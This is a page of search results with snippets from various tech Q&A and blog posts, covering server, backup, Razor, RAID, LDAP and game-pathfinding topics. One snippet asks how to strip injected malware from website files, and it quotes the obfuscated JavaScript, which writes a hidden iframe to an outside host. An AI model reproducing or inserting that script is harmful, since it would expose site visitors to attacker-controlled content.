Search Results

Search found 37101 results on 1485 pages for 'array based'.

Page 476/1485 | < Previous Page | 472 473 474 475 476 477 478 479 480 481 482 483  | Next Page >

  • Why doesnt file uploads work for a specific customer?

    - by nimo9367
    We have for some time now experienced some unexplainable behavior when a certain customer is trying to upload files to our web based application using a standard web form. It's a CGI based application and the server is running IIS6. However it works fine for all of our other customers using the same server and application so this must be a client side related issue? The request basically times out and you get to "page cannot be displayed". Does anyone have any idea of what might be the source of this problem?

    Read the article

  • Duplication of Windows 7 Backup

    - by Steven Pickles
    I use the built in backup utility for Windows 7 because it's automated and flexible enough to allow me to schedule a daily shadow copy backup of particular files and folders directly to a separate internal RAID 0 array (2 x 1TB). It's also lightweight and stays out of the way. For off-site backup purposes, each week I copy the contents of the internal backup from the RAID 0 array to an external 1 TB drive. I then store move this drive to a different building. The copy from the internal backup to the external backup typically works like this: mount and erase contents of external drive highlight "file" on internal drive, hit CTRL+C CTRL+V on root directory of external drive Is there a better way to synchronize? Microsoft's SyncToy application does a pitiful job, and often leaves the folders not truly synchronized... which completely defeats the ability to use the backup's restore feature.

    Read the article

  • How to Downgrade Razor 3 and fix the issue that CSHTML not work in VS10,12 ?

    - by Anirudha
    Originally posted on: http://geekswithblogs.net/anirugu/archive/2013/11/04/how-to-downgrade-razor-3-and-fix-the-issue-that.aspxFew days ago I migrate a project to MVC 4 and suddenly I have seen that MVC project’s cshtml file is no longer working. The problem happen because my project is now based on Razor 3 RC and VS12 doesn’t even have support it. (Remember that VS team will ship support in VS update 4). My migration update it to Razor 3 (which is not related to MVC 4, MVC 4 used old version of Razor 2).   So how to fix the problem. Since VS update 4 in development and MVC 3 support exist in both old Version of VS (10,12) then better to migrate back our Razor to old version so we can use our project in VS 10 or 12. If your project have Razor 3 and it seem that Syntax highlighting doesn’t work for you then I suggest you to try this Nuget package https://www.nuget.org/packages/UpgradeMvc3ToMvc4 Remember that this will not be succeed. What you need to do is delete package folder in your project and now open the packages.config remove all entry of package now.   Now Run this command PM> Install-Package UpgradeMvc3ToMvc4 If this is failed then see what thing make error in console. simply remove the reference and try again. Now run it and see this will work.   After run this you will see that WebGrease Dll have a version number issue. Simply update it to version 1.5.2 and now you have ready your project to run it in .net 4. If you do bin deployment then you don’t need to have installed MVC 4 on server either. Remember that MVC 5 is based on .net 4.5 which simply means you can’t run it in VS10. until VS12 update 4 MVC 5 cshtml page will be work as simple html pages (syntax highlighting and intellisense). Thanks for read my post

    Read the article

  • Speaking at Sinergija12

    - by DigiMortal
    Next week I will be speaker at Sinergija12, the biggest Microsoft conference held in Serbia. The first time I visited Sinergija it was clear to me that this is the event where I should go back. Why? Because technical level of sessions was very well in place and actually sessions I visited were pretty hardcore. Now, two years later, I will be back there but this time I’m there as speaker. My session at Sinergija12 Here are my three almost finished sessions for Sinergija12. ASP.NET MVC 4 Overview Session focuses on new features of ASP.NET MVC 4 and gives the audience good overview about what is coming. Demos cover all important new features - agent based output, new application templates, Web API and Single Page Applications. This session is for everybody who plans to move to ASP.NET MVC 4 or who plans to start building modern web sites.   Building SharePoint Online applications using Napa Office 365 Next version of Office365 allows you to build SharePoint applications using browser based IDE hosted in cloud. This session introduces new tools and shows through practical examples how to build online applications for SharePoint 2013.   Cloud-enabling ASP.NET MVC applications Cloud era is here and over next years more and more web applications will be hosted on cloud environments. Also some of our current web applications will be moved to cloud. This session shows to audience how to change the architecture of ASP.NET web application so it runs on shared hosting and Windows Azure with same code base. Also the audience will see how to debug and deploy web applications to Windows Azure. All developers who are coming to Sinergija12 are welcome to my sessions. See you there! :)

    Read the article

  • Recover deleted files on windows 2008 file server

    - by aniga
    We have recently been hit by a weird virus which made all files and folders a system files/folders and also it hid all files and folders par some weird ones it created including: ..exe porn.exe secret.exe password.exe etc We have managed to restore the files with attrib command to unhide and unmark them as system files however we have noticed that we are missing some 4 to 5 folders of which (based on my luck) 2 of them are the two most important client we have. I am not sure if these files were deleted by the worm/virus or by my colleagues who are not owning up to them but the files are now gone. Worst of all, we do not have any backup what so ever (Yes I know, we should not have done that but it is a lesson learned and since last night we have created two forms of backup systems one to external device and one on the cloud, but I doubt any of that will help us now) We have 1 Windows 2008 File server and 4 client computers based on Windows 2007. I would be grateful if anyone can help us on how we can recover from this disaster which could potentially put us out of business.

    Read the article

  • What is the value of checking in failing unit tests?

    - by user20194
    While there are ways of keeping unit tests from being executed, what is the value of checking in failing unit tests? I will use a simple example: Case Sensitivity. The current code is case sensitive. A valid input into the method is "Cat" and it would return an enum of Animal.Cat. However, the desired functionality of the method should not be case sensitive. So if the method described was passed "cat" it could possibly return something like Animal.Null instead of Animal.Cat and the unit test would fail. Though a simple code change would make this work, a more complex issue may take weeks to fix, but identifying the bug with a unit test could be a less complex task. The application currently being analyzed has 4 years of code that "works". However, recent discussions regarding unit tests have found flaws in the code. Some just need explicit implementation documentation (ex. case sensitive or not), or code that does not execute the bug based on how it is currently called. But unit tests can be created executing specific scenarios that will cause the bug to be seen and are valid inputs. What is the value of checking in unit tests that exercise the bug until someone can get around to fixing the code? Should this unit test be flagged with ignore, priority, category etc, to determine whether a build was successful based on tests executed? Eventually the unit test should be created to execute the code once someone fixes it. On one hand it shows that identified bugs have not been fixed. On the other, there could be hundreds of failed unit tests showing up in the logs and weeding through the ones that should fail vs. failures due to a code check-in would be difficult to find.

    Read the article

  • What is the correct way to implement Auth/ACL in MVC?

    - by WiseStrawberry
    I am looking into making a correctly laid out MVC Auth/ACL system. I think I want the authentication of a user (and the session handling) to be separate from the ACL system. (I don't know why but this seems a good idea from the things I've read.) What does MVC have to do with this question you ask? Because I wish for the application to be well integrated with my ACL. An example of a controller (CodeIgniter): <?php class forums extends MX_Controller { $allowed = array('users', 'admin'); $need_login = true; function __construct() { //example of checking if logged in. if($this->auth->logged_in() && $this->auth->is_admin()) { echo "you're logged in!"; } } public function add_topic() { if($this->auth->allowed('add_topic') { //some add topic things. } else { echo 'not allowed to add topic'; } } } ?> My thoughts $this->auth would be autoloaded in the system. I would like to check the $allowed array against the user currently (not) logged in and react accordingly. Is this a good way of doing things? I haven't seen much literature on MVC integration and Auth. I want to make things as easy as possible.

    Read the article

  • Web Applications Desktop Integrator (WebADI) Feature for Install Base Mass Update in 12.1.3

    - by LuciaC
    Purpose The integration of WebADI technology with the Install Base Mass Update function is designed to make creation and update of bulk item instances much easier than in the past. What is it? WebADI is an Excel-based desktop application where users can download an Excel template with item instances pre-populated based on search criteria.  Users can create and update item instances in the Excel sheet and finally upload the Excel data using an "upload" option available in the Excel menu. On upload, the modified data will bulk upload to interface tables which are processed by an asynchronous concurrent program that users can monitor for the uploaded results. Advantage: This allows users to work in a disconnected Environment: session time outs can be avoided, as once a template is downloaded the user can work in a disconnected environment and once all updates are done the new input can be uploaded. Also the data can be saved for later update and upload. For more details review the following: R12.1.3 Install Base WebADI Mass Update Feature (Doc ID 1535936.1) How To Use Install Base WebADI Mass Update Feature In Release 12.1.3 (Doc ID 1536498.1).

    Read the article

  • Internal speakers do not work

    - by Nikcefo
    I have a new (from scratch, not update) installation of Ubuntu 12.10 on my notebook, Asus A3Ac (It is based on Intel Centrino - Pentium M with full duplex Intel HDA codec). In older versions of Debian-based systems Intel HDA audio didn't work correctly. Alsamixer display wrong outputs and inputs (more than notebook really have). In clean installations internal speakers were playing, but they didn't mute when headphones was plugged in. There was a solution (propably not the best but working) - edit as root /etc/modprobe.d/alsa-base.conf and add a line "options snd-hda-intel model=z71v position_fix=1". After restart it worked correctly (alsamixer displayed correct devices and internal speakers were muted after I plugged in headphones). It was also working in Ubuntu 12.04. In Ubuntu 12.10 I have another problem. The alsamixer in default (don't have to edit alsa-base.conf) display correct outputs and inputs but internal speakers don't working if the headphones isn't plugged in. I have to manually disable "Auto-Mut" option in alsamixer, then the internal spakers works (but of course they don't mute when the headphones are pluged in). Thanks for any idea how to fix it. I'm not sure if it is a bug or it's caused by a "specific hardware". Tomas

    Read the article

  • How do I move an Amazon micro instance to a small instance?

    - by Navetz
    I want to move my instance to a micro instance to a small instance but when I try to launch a new AMI based on my Micro instance AMI it only gives me the option for 64 bit instances. My initial ami is based off an ubuntu 10.04 image. Is it not possible to move between 64 bit and 32 bit instance? Would it be possible to use a load balancer to have a 32bit instance and a 64bit instance work together? I have a website/web app that I will be uploading huge volumes of data to. I will be starting with 65gigs of images and then moving up to 100+ gigs of images. I am not sure which instance type would be best for this. I was going to use a load balancer and auto scaling to increase the number of instance when the load is high. Also when using a load balancer, does one of the AMI instance become the primary image and the rest act as clones of it?

    Read the article

  • Proper way to do texture mapping in modern OpenGL?

    - by RubyKing
    I'm trying to do texture mapping using OpenGL 3.3 and GLSL 150. The problem is the texture shows but has this weird flicker I can show a video here. My texcords are in a vertex array. I have my fragment color set to the texture values and texel values. I have my vertex shader sending the texture cords to texture cordinates to be used in the fragment shader. I have my ins and outs setup and I still don't know what I'm missing that could be causing that flicker. Here is my code: Fragment shader #version 150 uniform sampler2D texture; in vec2 texture_coord; varying vec3 texture_coordinate; void main(void) { gl_FragColor = texture(texture, texture_coord); } Vertex shader #version 150 in vec4 position; out vec2 texture_coordinate; out vec2 texture_coord; uniform vec3 translations; void main() { texture_coord = (texture_coordinate); gl_Position = vec4(position.xyz + translations.xyz, 1.0); } Last bit Here is my vertex array with texture coordinates: GLfloat vVerts[] = { 0.5f, 0.5f, 0.0f, 0.0f, 1.0f, 0.0f, 0.5f, 0.0f, 1.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 0.0f, 0.5f, 0.0f, 0.0f, 1.0f, 0.0f}; //tex x and y If you need to see all the code, here is a link to every file. Thank you for your help.

    Read the article

  • A* PathFinding Not Consistent

    - by RedShft
    I just started trying to implement a basic A* algorithm in my 2D tile based game. All of the nodes are tiles on the map, represented by a struct. I believe I understand A* on paper, as I've gone through some pseudo code, but I'm running into problems with the actual implementation. I've double and tripled checked my node graph, and it is correct, so I believe the issue to be with my algorithm. This issue is, that with the enemy still, and the player moving around, the path finding function will write "No Path" an astounding amount of times and only every so often write "Path Found". Which seems like its inconsistent. This is the node struct for reference: struct Node { bool walkable; //Whether this node is blocked or open vect2 position; //The tile's position on the map in pixels int xIndex, yIndex; //The index values of the tile in the array Node*[4] connections; //An array of pointers to nodes this current node connects to Node* parent; int gScore; int hScore; int fScore; } Here is the rest: http://pastebin.com/cCHfqKTY This is my first attempt at A* so any help would be greatly appreciated.

    Read the article

  • How does Game Salad compare with Cocos2D in terms of 2D game development?

    - by jih
    I want to make some 2d games for iOS. I first come across cocos2d and kobold but then wanted something more graphical for rapid prototyping. I then found Game Maker which doesn't support iOS but is fairly easy to learn and then found Game Salad which supports iOS as well as other platforms. I know this question has been ask before but I want to know in terms of the types of games I want to develop what an learning investment path would be best. The types of games genre I am interest are: Side scrollers Simple games like diamond dash or ninja fruits, shanghai, etc Old fashioned zelda or dragonquest type (nintendo fan here:-) 2d adventure RPG games (real time or turn based) Mystery turn based games like carmen sandiego, wizardry, myst etc. So now the question becomes for me becomes which game development environment should I invest my time in learning. Game Salad or cocos2d? To make that decision I was wondering if experienced game programmers and help with some pointers: It would seem game salad would be great for quickies being graphical but in terms of 2d platform games etc would there be speed/performance/feature penalties? Are there certain 2d games genre of the 4 above that Game salad is better at while certain type cocos2d would be better at?

    Read the article

  • How to kill all screens that has been up longer then 4 weeks?

    - by Darkmage
    Im creating a script that i am executing every night at 03.00 that will kill all screens that has been running longer than 3 weeks. anyone done anything similar that can help? If you got a script or suggestion to a better method please help by posting :) I was thinking maybe somthing like this. First do a dump to textfile ps -U username -ef | grep SCREEN dump.txt then do a loop running through all lines of dump.txt with a regex and putting pid of the prosseses with STIME 3weeksago in a array. then do a kill loop on the array result.

    Read the article

  • In developing a soap client proxy, which return structure is easier to use and more sensible?

    - by cori
    I'm writing (in PHP) a client/proxy for a SOAP web service. The return types are consistently wrapped in response objects that contain the return values. In many cases this make a lot of sense - for instance when multiple values are being returned: GetDetailsResponse Object ( Results Object ( [TotalResults] => 10 [NextPage] => 2 ) [Details] => Array ( [0] => Detail Object ( [Id] => 1 ) ) ) But some of the methods return a single scalar value or a single object or array wrapped in a response object: GetThingummyIdResponse Object ( [ThingummyId] => 42 ) In some cases these objects might be pretty deep, so getting at properties within requires drilling down several layers: $response->Details->Detail[0]->Contents->Item[5]->Id And if I unwrap them before passing them back I can strip out a layer from consumers' code. I know I'm probably being a little bit of an Architecture Astronaut here, but the latter style really bug me, so I've been working through my code to have my proxy methods just return the scalar value to the client code where there's no absolute need for a wrapper object. My question is, am I actually making things more difficult for the consumers of my code? Would I be better off just leaving the return values wrapped in response objects so that everything is consistent, or is removing unneccessary layers of indirection/abstraction worthwhile?

    Read the article

  • Artists and music - Need Help Deciding on a CMS

    - by infty
    A friend has asked me to build a site with the following options: staff members must be able to add new music and artists to the page a gallery must be provided - it is also good if each artist has the ability to have his/her own smaller gallery users must be able to vote for artists users must be able to alter in discussions (forums or comments sections) staff members must be able to blog staff members must be able to write articles I did a small project where i actually implemented all of these features, but I want to use an existing content management system for all of these features so that future developers can, hopefully, more easy extend the website. And also, so that I don't have to provide too much documentation. I have never developed a website using an external CMS like Drupal or Wordpress and after seeing hours of tutorial videos of both systems, I still can't make up my mind on whether i should : a) use Drupal 7 b) use Wordpress 3 c) create my own cms I can imagine that staff members would also want to create content using iPhone or android based mobile devices, but this is not a required feature. Can someone, with experience, please tell me about their experiences with larger projects like this? The site will have approximately 400 000 - 500 000 visitors (not daily visitors, based on numbers from last year in a period of 4 months)

    Read the article

  • What is the best way to store a table in C++

    - by Topo
    I'm programming a decision tree in C++ using a slightly modified version of the C4.5 algorithm. Each node represents an attribute or a column of your data set and it has a children per possible value of the attribute. My problem is how to store the training data set having in mind that I have to use a subset for each node so I need a quick way to only select a subset of rows and columns. The main goal is to do it in the most memory and time efficient possible (in that order of priority). The best way I have thought of is to have an array of arrays (or std::vector), or something like that, and for each node have a list (array, vector, etc) or something with the column,line(probably a tuple) pairs that are valid for that node. I now there should be a better way to do this, any suggestions? UPDATE: What I need is something like this: In the beginning I have this data: Paris 4 5.0 True New York 7 1.3 True Tokio 2 9.1 False Paris 9 6.8 True Tokio 0 8.4 False But for the second node I just need this data: Paris 4 5.0 New York 7 1.3 Paris 9 6.8 And for the third node: Tokio 2 9.1 Tokio 0 8.4 But with a table of millions of records with up to hundreds of columns. What I have in mind is keep all the data in a matrix, and then for each node keep the info of the current columns and rows. Something like this: Paris 4 5.0 True New York 7 1.3 True Tokio 2 9.1 False Paris 9 6.8 True Tokio 0 8.4 False Node 2: columns = [0,1,2] rows = [0,1,3] Node 3: columns = [0,1,2] rows = [2,4] This way on the worst case scenario I just have to waste size_of(int) * (number_of_columns + number_of_rows) * node That is a lot less than having an independent data matrix for each node.

    Read the article

  • Is it safe to set MySQL isolation to "Read Uncommitted" (dirty reads) for typical Web usage? Even with replication?

    - by Continuation
    I'm working on a website with typical CRUD web usage pattern: similar to blogs or forums where users create/update contents and other users read the content. Seems like it's OK to set the database's isolation level to "Read Uncommitted" (dirty reads) in this case. My understanding of the general drawback of "Read Uncommitted" is that a reader may read uncommitted data that will later be rollbacked. In a CRUD blog/forum usage pattern, will there ever be any rollback? And even if there is, is there any major problem with reading uncommitted data? Right now I'm not using any replication, but in the future if I want to use replication (row-based, not statement-based) will a "Read Uncommitted" isolation level prevent me from doing so? What do you think? Has anyone tried using "Read Uncommitted" on their RDBMS?

    Read the article

  • Windows 2008 Best Raid Configuration

    - by Brandon Wilson
    I have 4 2TB hard drives and I was thinking about using Raid 10. This would give me 4TB correct? My next question is would it be easy to add more hard drives to the raid array. For example if I bought another hard drive can I add it to the array without backing up any data? Basically I want to be able to start off with 4TB and when the space becomes full add more space as needed. If this isn't possible with Raid 10, is it possible with any Raid configuration. Any suggestions would be appreciated. Thank you.

    Read the article

  • Linux Raid: Can mdadm --grow a raid1 while mounted?

    - by Chris
    I have 2 500gb drives in a RAID1 setup that I needed to upgrade for more space. I mdadm --fail'ed each drive in turn and I used dd to copy each drive to it's respective larger drive (2tb each), removed the smaller drives and replaced them with the larger drives, and reassembled the array and forced a resync. So now I've got a 500gb RAID1 sitting on 2TB drives, and wish to grow them. The plan is to use mdadm --manage /dev/md0 --grow to grow them, then boot a rescue cd, assemble the array under that environment, and do the resize2fs on them. Can I use mdadm --grow on a mounted and live filesystem? Also, do I need more options to make sure the grow operation stays raid1?

    Read the article

  • How can I remove malware code in multiple files with sed?

    - by user47556
    I've this malware code in so many .html and .php files on the server. I need to remove them using sed -i expression search all files under directory /home/ find infected files remove the code by replacing it with a white space var usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66';var nimbchnzujc = 'PaBUTyjaZYg72';var szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22';var xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22';var mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';var nixyhgyjouf = 'koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg74PaBUTyjaZYg69PaBUTyjaZYg74PaBUTyjaZYg6cPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var niupgeebkhf = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg63PaBUTyjaZYg72PaBUTyjaZYg6fPaBUTyjaZYg6cPaBUTyjaZYg6cPaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg67PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg6ePaBUTyjaZYg6fPaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg66PaBUTyjaZYg72PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg3e';var yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';var tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61';var zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e';var yydszqnduko = new Array();yydszqnduko[0]=new Array(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);document['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](window['PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](yydszqnduko.toString().replace(/PaBUTyjaZYg/g,'%')));

    Read the article

  • Summing up spreadsheet data when a column contains “#N/A”

    - by Doris
    I am using Goggle Spreadsheet to work up some historical stock data and I use a Google function (=googlefinance=…) to import the historical closing prices for a stock, then I work with that data further. But, in that list of data generated from the =googlefinance=… function, one of the amounts comes up as #N/A. I don’t know why, but it happens for various symbols that I have tried. When I use a max function on the array, which includes the N/A line, the max function does not come up with anything but an N/A, so the N/A throws off any further functions. I thought I’d create a second column to the right of the imported data in which I can give it an IF function, something like, If ((A1 <0), "0", A1), with the expectation that it would return 0 if cell A1 is the N/A, and the cell value if it is not N/A. However, this still returns N/A. I also tried an IS BLANK function but that resulted in the same NA. Does anyone have any suggestions for a workaround to eliminate the N/A from an array of numbers that I am trying to work with?

    Read the article

  • Using the Coherence ConcurrentMap Interface (Locking API)

    - by jpurdy
    For many developers using Coherence, the first place they look for concurrency control is the com.tangosol.util.ConcurrentMap interface (part of the NamedCache interface). The ConcurrentMap interface includes methods for explicitly locking data. Despite the obvious appeal of a lock-based API, these methods should generally be avoided for a variety of reasons: They are very "chatty" in that they can't be bundled with other operations (such as get and put) and there are no collection-based versions of them. Locks do directly not impact mutating calls (including puts and entry processors), so all code must make explicit lock requests before modifying (or in some cases reading) cache entries. They require coordination of all code that may mutate the objects, including the need to lock at the same level of granularity (there is no built-in lock hierarchy and thus no concept of lock escalation). Even if all code is properly coordinated (or there's only one piece of code), failure during updates that may leave a collection of changes to a set of objects in a partially committed state. There is no concept of a read-only lock. In general, use of locking is highly discouraged for most applications. Instead, the use of entry processors provides a far more efficient approach, at the cost of some additional complexity.

    Read the article

  • How do I configure Reverse Group Membership Maintenance on an openldap server? (memberOf)

    - by emills
    I am currently working on integrating LDAP authentication into a system and I would like to restrict access based on LDAP group. The only way to do this is via a search filter and therefore I believe my only option to be the use of the "memberOf" attribute in my search filter. It is my understanding that the "memberOf" attribute is an operational attribute which can be created by the server for me anytime a new "member" attribute is created for any "groupOfNames" entry on the server. My main goal is to be able to add a "member" attribute to an existing "groupOfNames" entry and have a matching "memberOf" attribute be added to the DN I provide. What I have managed to achieve so far: I'm still pretty new to LDAP administration but based on what I found in the openldap admin's guide, it looks like Reverse Group Membership Maintence aka "memberof overlay" would achieve exactly the effect I am looking for. My server is currently running a package installation (slapd on ubuntu) of openldap 2.4.15 which uses "cn=config" style runtime configuration. Most of the examples I have found still reference the older "slapd.conf" method of static configuration and I have tried my best to adapt the configurations to the new directory based model. I have added the following entries to enable the memberof overlay module: Enable the module with olcModuleLoad cn=config/cn\=module\{0\}.ldif dn: cn=module{0} objectClass: olcModuleList cn: module{0} olcModulePath: /usr/lib/ldap olcModuleLoad: {0}back_hdb olcModuleLoad: {1}memberof.la structuralObjectClass: olcModuleList entryUUID: a410ce98-3fdf-102e-82cf-59ccb6b4d60d creatorsName: cn=config createTimestamp: 20090927183056Z entryCSN: 20091009174548.503911Z#000000#000#000000 modifiersName: cn=admin,cn=config modifyTimestamp: 20091009174548Z Enabled the overlay for the database and allowed it to use it's default settings (groupOfNames,member,memberOf,etc) cn=config/olcDatabase={1}hdb/olcOverlay\=\{0\}memberof dn: olcOverlay={0}memberof objectClass: olcMemberOf objectClass: olcOverlayConfig objectClass: olcConfig objectClass: top olcOverlay: {0}memberof structuralObjectClass: olcMemberOf entryUUID: 6d599084-490c-102e-80f6-f1a5d50be388 creatorsName: cn=admin,cn=config createTimestamp: 20091009104412Z olcMemberOfRefInt: TRUE entryCSN: 20091009173500.139380Z#000000#000#000000 modifiersName: cn=admin,cn=config modifyTimestamp: 20091009173500Z My current result: By using the above configuration, I am able to add a NEW "groupOfNames" with any number of "member" entries and have all the involved DNs updated with a "memberOf" attribute. This is part of the behavior I would expect. While I believe the following should have been accomplished with the memberof overlay, I still do not know how to do the following and I would gladly welcome any advice: Add a "member" attribute to an EXISTING "groupOfNames" and have a corresponding "memberOf" attribute be created automatically. Remove a "member" attribute and have the corresponding "memberOf" attribute" be removed automatically.

    Read the article

< Previous Page | 472 473 474 475 476 477 478 479 480 481 482 483  | Next Page >